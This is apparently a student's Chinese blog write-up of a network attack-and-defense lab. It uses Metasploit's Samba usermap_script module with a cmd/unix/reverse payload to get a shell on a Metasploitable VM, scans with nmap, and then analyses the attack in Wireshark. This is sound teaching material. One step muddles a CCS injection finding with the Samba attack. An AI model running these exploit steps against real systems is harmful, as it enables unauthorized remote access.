20222806 2022-2023-2 《网络攻防实践》第七次作业

文章介绍了渗透测试的基本概念和流程,包括信息收集、漏洞扫描、利用和清理。实践中使用Metasploit对Linux靶机的Samba服务Usermap_script漏洞进行攻击,获取主机访问权限。同时,文章还涉及攻防对抗,攻击方利用Metasploitable靶机的漏洞,而防守方通过网络监听工具如Wireshark分析攻击过程。
摘要由CSDN通过智能技术生成

实践内容

实践知识:渗透攻击

渗透攻击(Penetration Testing)是一种授权的安全评估方法,旨在模拟恶意攻击者的行为,以发现计算机系统和网络中的漏洞,并提供相应的修复建议。下面是一些关于渗透攻击的知识

渗透测试目的:渗透测试的目的是评估目标系统的安全性,发现潜在的漏洞和弱点,以便组织可以采取相应的措施来修复这些问题,加强系统的安全性。

渗透测试方法:渗透测试通常包括以下步骤:
信息收集:收集与目标系统相关的信息,如域名、IP地址、子域名、网络拓扑等。
漏洞扫描:使用扫描工具对目标系统进行漏洞扫描,发现系统中可能存在的安全漏洞。
漏洞利用:利用发现的漏洞进行攻击,验证其可利用性和潜在的影响。
权限提升:在系统中获取更高权限,以便进一步探索系统的安全性。
数据采集:收集关键信息和敏感数据,如数据库内容、用户凭据等。
清理和报告:清理对目标系统的影响,并生成渗透测试报告,详细描述发现的漏洞和提供修复建议。

渗透测试类型:根据测试的范围和权限级别,渗透测试可以分为以下几种类型:
(1)黑盒测试:渗透测试人员没有关于目标系统内部结构和信息的事先了解,模拟外部攻击者进行测试。
(2)白盒测试:渗透测试人员拥有关于目标系统的详细内部信息,模拟内部攻击者进行测试。
(3)灰盒测试:渗透测试人员部分了解目标系统的信息,模拟具有一定内部知识的攻击者进行测试。

渗透测试工具:渗透测试通常使用各种工具和技术来辅助测试过程。一些常用的工具包括:
(1)Nmap:用于网络扫描和服务识别。
(2)Metasploit:一款强大的漏洞利用框架,用于开发和执行攻击代码。
(3)Burp Suite:用于Web应用程序渗透测试,包括漏洞扫描和代理攻击。
(4)Wireshark:网络协议分析工具,用于捕获和分析网络数据包。
(5)Hydra:用于暴力破解密码的工具。
(6)SQLMap:用于自动化检测和利用SQL注入漏洞的工具。

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:
①启动Metasploit软件,可根据个人喜好使用msfconsole、msfgui、msfweb之一;
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
④设置渗透攻击参数(RHOST,LHOST,TARGET等);
⑤执行渗透攻击;
⑥查看是否正确得到远程Shell,并查看获得的权限。

(2)实践作业:攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。
防守方:使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

实践过程

(1)使用Metasploit进行Linux远程渗透攻击

虚拟机IP地址
Kali-Linux(攻击机)192.168.200.4
Metasploitable(靶机)192.168.200.7

首先是攻击机和靶机互ping
在这里插入图片描述
在这里插入图片描述
打开Kali上的Metasploit工具:
在这里插入图片描述
使用search命令搜索 search samba 用于选择合适的渗透攻击漏洞
在这里插入图片描述
找到路径exploit/multi/samba/usermap_script ,使用use命令进行加载
在这里插入图片描述
使用show payloads显示攻击载荷
选择set payload cmd/unix/reverse
在这里插入图片描述
设置攻击机和靶机的ip地址

set RHOST 192.168.200.7
set LHOST 192.168.200.4

在这里插入图片描述
攻击成功,并且成功获得权限
在这里插入图片描述

(2)实践作业:攻防对抗实践

虚拟机IP地址
Kali-Linux(攻击机)192.168.200.8
Metasploitable(靶机)192.168.200.7

使用sudo nmap -sV 192.168.200.7扫描目标主机的相关信息
在这里插入图片描述
使用nmap --script vuln 192.168.200.7来寻找存在的漏洞
在这里插入图片描述
可以看到这里有一个ccs的注入漏洞
查找到的信息有相关的来源和说明,注意到这是一个CVE编号为2014-0224的漏洞
接下来利用set payload cmd/unix/reverse漏洞进行攻击
在这里插入图片描述
成功进入
在这里插入图片描述
防守方监听:对第二次的攻击进行防守
利用wireshark对网卡进行监听,发现了这一段非法操作terminal界面后找到攻击者ip是192.168.200.8,因此输入命令进行筛选

ip.addr == 192.168.200.7 && ip.addr == 192.168.200.8

在这里插入图片描述
可以分析攻击机一开始的报文,是发送了Negotiate Protocol Request,靶机进行Negotiate Protocol Response回应。从139端口入手,这段SMB包中看到了相关的shell命令,因此可以通过这个判断是Samba的usermap_script远程命令注入漏洞
在这里插入图片描述

学习中遇到的问题及解决

因为和第六次的作业操作过程差不多,因此没有遇到什么问题

实践总结

相较第六次实践,本次实践主要在于学习和研究针对linux和Ubuntu的攻击,并且分析相关系统的漏洞与windows之间的不同

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值